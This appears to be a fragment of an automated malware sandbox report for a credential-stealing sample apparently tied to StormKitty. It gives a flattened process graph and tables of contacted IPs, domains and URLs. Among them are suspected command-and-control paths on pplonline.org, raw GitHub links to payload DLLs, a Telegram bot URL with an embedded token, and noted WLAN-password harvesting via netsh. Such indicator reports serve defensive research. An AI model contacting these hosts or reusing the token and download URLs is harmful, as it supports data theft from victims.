TUT-ASUS United States 28->90 92 api.telegram.org 149.154.167.220, 443, 49747 TELEGRAMRU United Kingdom 28->92 94 3 other IPs or domains 28->94 84 C:\Users\user\AppData\...\AnonFileApi.dll, PE32 28->84 dropped 86 C:\Users\user\AppData\Local\...\DotNetZip.dll, PE32 28->86 dropped 118 Antivirus detection for dropped file 28->118 120 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 28->120 122 May check the online IP address of the machine 28->122 124 5 other signatures 28->124 37 cmd.exe 28->37         started        40 cmd.exe 28->40         started        42 WerFault.exe 28->42         started        44 WerFault.exe 28->44         started        46 conhost.exe 35->46         started        48 taskkill.exe 35->48         started        file12 signatures13 process14 signatures15 112 Uses netsh to modify the Windows network and firewall settings 37->112 114 Tries to harvest and steal WLAN passwords 37->114 50 conhost.exe 37->50         started        52 chcp.com 37->52         started        54 netsh.exe 37->54         started        56 findstr.exe 37->56         started        58 conhost.exe 40->58         started        60 chcp.com 40->60         started        62 netsh.exe 40->62         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
108.167.165.140
 pplonline.org United States
46606 UNIFIEDLAYER-AS-1US false
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
185.199.108.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false
104.18.115.97
 icanhazip.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
raw.githubusercontent.com 185.199.108.133 true
ip-api.com 208.95.112.1 true
pplonline.org 108.167.165.140 true
api.telegram.org 149.154.167.220 true
icanhazip.com 104.18.115.97 true
201.75.14.0.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://pplonline.org/Cgi//3.jpg true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://pplonline.org/Cgi//5.jpg true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://icanhazip.com/ false
    		high
    https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll true
    • Avira URL Cloud: malware
    		 unknown
    http://pplonline.org/Cgi//4.jpg true
    • Avira URL Cloud: safe
    		 unknown
    http://pplonline.org/Cgi//main.php true
    • Avira URL Cloud: safe
    		 unknown
    http://pplonline.org/Cgi//1.jpg true
    • Avira URL Cloud: safe
    		 unknown
    http://pplonline.org/Cgi//2.jpg true
    • Avira URL Cloud: safe
    		 unknown
    aegismd.ca/cgi/ true
    • Avira URL Cloud: safe
    		 low
    https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll true
    • Avira URL Cloud: safe
    		 unknown
    http://pplonline.org/Cgi//7.jpg true
    • Avira URL Cloud: safe
    		 unknown
    http://pplonline.org/Cgi/ true
    • Avira URL Cloud: safe
    		 unknown
    http://pplonline.org/Cgi//6.jpg true
    • Avira URL Cloud: safe
    		 unknown
    https://api.telegram.org/bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe false
      		high
      http://ip-api.com/line/?fields=hosting false
        		high